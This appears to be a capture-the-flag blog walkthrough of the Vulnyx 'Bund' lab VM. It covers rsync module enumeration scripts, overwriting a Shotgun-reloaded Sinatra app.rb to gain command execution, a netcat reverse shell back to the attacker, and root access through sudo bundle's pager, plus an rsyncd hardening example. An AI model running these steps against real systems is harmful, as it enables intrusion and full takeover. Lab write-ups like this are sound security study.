Vulnyx-Bund-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.226 08:00:27:03:c1:c7 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.039 seconds (125.55 hosts/sec). 4 responded
export ip=192.168.60.226
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.226:22
Open 192.168.60.226:80
Open 192.168.60.226:873
Open 192.168.60.226:9393
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 16:47 CST
Initiating ARP Ping Scan at 16:47
Scanning 192.168.60.226 [1 port]
Completed ARP Ping Scan at 16:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:47
Completed Parallel DNS resolution of 1 host. at 16:47, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:47
Scanning 192.168.60.226 [4 ports]
Discovered open port 22/tcp on 192.168.60.226
Discovered open port 9393/tcp on 192.168.60.226
Discovered open port 873/tcp on 192.168.60.226
Discovered open port 80/tcp on 192.168.60.226
Completed SYN Stealth Scan at 16:47, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.226
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-03-04 16:47:36 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
873/tcp open rsync syn-ack ttl 64
9393/tcp open unknown syn-ack ttl 64
MAC Address: 08:00:27:03:C1:C7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Directory scan

Basically no information at all:

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.226
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 19]
Progress: 922428 / 1038220 (88.85%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 922428 / 1038220 (88.85%)
===============================================================
Finished
===============================================================

Opening it in a browser, the content is just a "site under construction" page.


Visiting port 9393:

Exactly the same.

Fuzz the rsync port for module names.

For details, see Vulnyx-Bola-Walkthrough | Pepster's Blog.

After waiting a long time,

the enumeration turned up an rsync module named fileadmin:

for i in $(cat /usr/share/seclists/Discovery/Web-Content/common.txt);do echo $i;rsync -av --list-only rsync://$ip/$i 2>&1|grep -Piv "error";done
…(output omitted)…
fileadmin

receiving incremental file list
drwxrwxrwx 4,096 2023/05/27 22:40:29 .
-rwxrwxrwx 14 2023/05/27 18:00:12 Gemfile
-rwxrwxrwx 370 2023/05/27 18:01:38 Gemfile.lock
-rwxrwxrwx 75 2023/05/27 22:30:25 app.rb

sent 20 bytes received 110 bytes 86.67 bytes/sec
total size is 459 speedup is 3.53

Or refer to noname's Python script:

#!/usr/bin/env python3
# pip install pwntools

import subprocess
import argparse
from pwn import log, context

context.log_level = 'info'

def run_rsync(target_ip, word):
    # Ask the daemon to list the module named `word`; a hit returns a non-empty listing
    rsync_command = f'rsync -av --list-only rsync://{target_ip}/{word}'
    try:
        result = subprocess.run(rsync_command, shell=True, check=True,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        if result.stdout.strip():
            return result.stdout.strip()
        return None
    except subprocess.CalledProcessError:
        # rsync exits non-zero for an unknown module, so treat that as a miss
        return None

def main(target_ip, wordlist_file):
    try:
        with open(wordlist_file, 'r') as file:
            words = file.read().splitlines()

        for word in words:
            progress = log.progress(f"Checking {word}")
            output = run_rsync(target_ip, word)
            progress.success("Done")
            if output:
                log.info(f"Listing for {word}: {output}")
                break  # stop at the first module that answers

    except FileNotFoundError:
        log.failure(f"Wordlist file '{wordlist_file}' not found.")
    except Exception as e:
        log.failure(f"An error occurred: {e}")

if __name__ == "__main__":
    log.info("")
    log.info("===================================")
    log.info(" Rsync Enumeration")
    log.info("===================================")
    log.info("")

    parser = argparse.ArgumentParser(description='Run rsync command with wordlist.')
    parser.add_argument('-t', '--target-ip', required=True, help='Target IP address for rsync')
    parser.add_argument('-w', '--wordlist', required=True, help='Path to wordlist file')
    args = parser.parse_args()

    main(args.target_ip, args.wordlist)

Clone these files to the local machine:

❯ rsync -av rsync://$ip/fileadmin ./rsync

receiving incremental file list
created directory ./rsync
./
Gemfile
Gemfile.lock
app.rb

sent 84 bytes received 705 bytes 143.45 bytes/sec
total size is 459 speedup is 0.58
cd rsync

I noticed one file is interesting:

cat app.rb
require 'sinatra'
require 'shotgun'

get '/' do
"Under Construction"
end

  1. require 'sinatra':
    • This line loads the Sinatra library, a small framework for building web applications. Sinatra makes writing web applications very simple and intuitive.
  2. require 'shotgun':
    • This line loads the Shotgun library. Shotgun is a development-stage tool that automatically reloads the application on every request, so you don't need to restart the server by hand to see code changes. It is meant for development and testing.
  3. get '/' do ... end:
    • This block defines a route handler. When a user visits the root path ('/'), this code runs.
    • get '/' means it handles HTTP GET requests.
    • do ... end is a block; the code inside it runs whenever the route is accessed.
    • The block simply returns the string "Under Construction", which is what the user sees in the browser when visiting the root path.

This Ruby program can execute shell commands.

Anything wrapped in backticks is run by the shell and its output is returned as the response:

require 'sinatra'
require 'shotgun'

get '/' do
`id`
end

I modified the file and tried re-uploading it to fileadmin:

❯ vi app.rb
❯ rsync -av app.rb rsync://$ip/fileadmin

sending incremental file list
app.rb

sent 170 bytes received 41 bytes 20.10 bytes/sec
total size is 59 speedup is 0.28

As a result the target hung and none of its ports were open anymore; there was nothing for it but to reboot the VM.

Try curl again:

❯ curl http://192.168.60.226:9393/
uid=1000(axel) gid=1000(axel) grupos=1000(axel)

Commands execute normally: because Shotgun reloads app.rb on every request, the uploaded file took effect without any restart.
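The whole chain rests on an rsync module that is anonymously writable and serves the application's own source. As an added example (not from the original post, and not the VM's actual rsyncd.conf, which the walkthrough never shows), here is a module definition in the shape that behaviour implies, beside a hardened version. The module path, the `deploy` account, the secrets file and the network range are assumptions.

```ini
# --- Weak (assumed): anonymous clients may list AND write the module ---
# Every file the Sinatra app loads can be replaced over rsync, and
# Shotgun reloads app.rb on the next request, so a write is a code change.
[fileadmin]
    path = /opt/serve
    comment = app sources
    read only = no
    list = yes
    uid = axel
    gid = axel

# --- Hardened: read-only, authenticated, network-restricted ---
# "list = no" only hides the module from "rsync rsync://host/"; a wordlist
# still finds it (that is exactly how fileadmin was enumerated above), so
# the real controls are "read only", "auth users" and "hosts allow".
[fileadmin]
    path = /opt/serve
    comment = app sources
    read only = yes
    list = no
    use chroot = yes
    auth users = deploy
    secrets file = /etc/rsyncd.secrets
    hosts allow = 192.168.60.0/24
    uid = nobody
    gid = nogroup
```

The secrets file holds `deploy:<password>` lines and must be mode 0600 or rsync refuses it (`strict modes`); if the source must be writable for deployment, give that to a separate authenticated module rather than the one the running app reads from.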

Try a reverse shell:

❯ vi app.rb
require 'sinatra'
require 'shotgun'

get '/' do
`nc -e /bin/bash 192.168.60.100 4444 `
end
❯ rsync -av app.rb rsync://$ip/fileadmin

sending incremental file list
app.rb

sent 203 bytes received 41 bytes 162.67 bytes/sec
total size is 93 speedup is 0.38

User Privilege Escalation

Listen on the port:

❯ pwncat-cs -lp 4444
[17:27:46] Welcome to pwncat 🐈! __main__.py:164
[17:27:47] received connection from 192.168.60.226:59944 bind.py:84
[17:27:47] 0.0.0.0:4444: normalizing shell path manager.py:957
[17:27:48] 192.168.60.226:59944: registered new host w/ db manager.py:957
(local) pwncat$
(remote) axel@bund:/opt/serve$
(remote) axel@bund:/opt/serve$ cd ~
(remote) axel@bund:/home/axel$ cat user.txt
2cbcb2f721f743c1a42dcd092dc571ea

Root Privilege Escalation

The user has sudo rights on bundle. Its help function displays a man page through less, and less can be used to escalate privileges:

(remote) axel@bund:/home/axel$ sudo -l
Matching Defaults entries for axel on bund:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User axel may run the following commands on bund:
(root) NOPASSWD: /usr/local/bin/bundle
(remote) axel@bund:/home/axel$ sudo /usr/local/bin/bundle --help
root@bund:/home/axel# id
uid=0(root) gid=0(root) grupos=0(root)
root@bund:/home/axel# cat /root/root.txt
812efa110d7a6029cbf87d5b97d53691